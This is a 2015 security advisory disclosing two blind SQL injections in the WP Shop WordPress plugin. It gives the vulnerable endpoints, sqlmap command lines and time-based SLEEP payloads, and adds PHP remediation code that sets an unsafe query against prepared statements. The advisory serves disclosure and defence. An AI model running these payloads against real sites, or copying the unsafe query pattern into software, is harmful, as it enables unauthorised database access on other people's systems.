Subject: Blind SQL injections in WP Shop 3.4.3.15
Date: Wed, 8 Jul 2015 22:52:30 +0200

Hello,

Plugin: WP Shop 3.4.3.15 https://wordpress.org/plugins/wp-shop-original/

Remote unauthenticated attackers and authenticated users can execute arbitrary SQL commands.

1. SQL injection (cart_save()) (unauthenticated)

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=cart_save
Vulnerable parameter: wpshop_id

Example PHP callstack:

cart_save   [/tmp/wpplugin/wp-shop-original/ajax.php:182]
wpdb::get_results 

Sqlmap verification:

sqlmap --method POST --dbms mysql --data "wpshop_id=1" -u http://localhost/wp-admin/admin-ajax.php?action=cart_save -p wpshop_id

...
Parameter: wpshop_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: wpshop_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))JkxC)
...


2. SQL injection (getDigitalOrder()) (authenticated users)

Method: POST
Url: http://localhost/?wpdownload=1&order_id=[sqli]
Vulnerable parameter: order_id

Please note that the attacker needs a valid post_id with digital_link meta.

Example PHP callstack:

Wpshop_Boot::__construct   [/wp-shop-original/classes/class.Wpshop.Boot.php:42]
Wpshop_Digital::__construct   [/wp-shop-original/classes/class.Wpshop.Digital.php:7]
Wpshop_Digital::checkLink   [/wp-shop-original/classes/class.Wpshop.Digital.php:43]
Wpshop_Digital::getDigitalOrder   [/wp-shop-original/classes/class.Wpshop.Digital.php:33]
wpdb::get_results

Sqlmap verification:

sqlmap --cookie "..." --dbms mysql -u "http://localhost/?wpdownload=1&order_id=1" -p order_id

...
Parameter: order_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: wpdownload=1&order_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nWlh)
...
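Both call stacks above end the same way: a request parameter (wpshop_id in cart_save(), order_id in getDigitalOrder()) reaches wpdb::get_results() without being prepared. The snippet below is an added illustration, not the plugin's code and not part of the original advisory: it shows that unsafe pattern next to the fix WordPress's own API provides, casting the id with absint() and binding it with $wpdb->prepare(). The table names, hook names, nonce action and the ownership check on the order are assumptions chosen for the example.

```php
<?php
// Added illustrative example (not WP Shop's actual code). Table/column names,
// nonce action and ownership rule are assumptions made for this example.

// UNSAFE (hypothetical reconstruction of the reported pattern): the raw request
// value is concatenated into the SQL string that reaches wpdb::get_results(),
// so anything appended to the number is executed as SQL.
function wpshop_lookup_unsafe( $raw_id ) {
    global $wpdb;
    $sql = "SELECT * FROM {$wpdb->prefix}wpshop_cart WHERE id = " . $raw_id;
    return $wpdb->get_results( $sql );
}

// FIXED: reduce the value to a non-negative integer and bind it with
// wpdb::prepare(). %d is emitted as an integer literal, so no part of the
// input can change the structure of the query.
function wpshop_lookup_safe( $raw_id ) {
    global $wpdb;
    $id = absint( $raw_id );
    if ( 0 === $id ) {
        return array(); // reject empty or non-numeric ids before touching the DB
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}wpshop_cart WHERE id = %d",
        $id
    );
    return $wpdb->get_results( $sql );
}

// Finding 1 wiring (admin-ajax.php?action=cart_save). Keep the nopriv hook only
// if anonymous carts are really required; the nonce check stops the endpoint
// from being driven cross-site.
add_action( 'wp_ajax_cart_save', 'wpshop_cart_save_handler' );
add_action( 'wp_ajax_nopriv_cart_save', 'wpshop_cart_save_handler' );

function wpshop_cart_save_handler() {
    check_ajax_referer( 'wpshop_cart', 'nonce' ); // assumed nonce action and field name
    $raw  = isset( $_POST['wpshop_id'] ) ? $_POST['wpshop_id'] : 0;
    $rows = wpshop_lookup_safe( $raw );
    wp_send_json_success( $rows );
}

// Finding 2 (?wpdownload=1&order_id=...): same fix for the order_id query
// parameter, plus an ownership check so a logged-in user can only resolve an
// order post they authored (assumed data model: orders are posts).
function wpshop_get_digital_order_safe() {
    global $wpdb;
    $order_id = isset( $_GET['order_id'] ) ? absint( $_GET['order_id'] ) : 0;
    if ( 0 === $order_id || ! is_user_logged_in() ) {
        return null;
    }
    return $wpdb->get_row( $wpdb->prepare(
        "SELECT * FROM {$wpdb->posts} WHERE ID = %d AND post_author = %d",
        $order_id,
        get_current_user_id()
    ) );
}
```

The time-based payloads sqlmap reports above only work because the id is interpolated as text; once the value is cast to an integer and passed through a %d placeholder, the trailing AND (SELECT ...) clause never reaches MySQL. Reviewing a plugin for this class of bug comes down to grepping for get_results(), get_row() and query() calls whose SQL string is built with "." or "{$...}" from request data rather than from prepare().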



-- 
Regards,
Marcin Probola,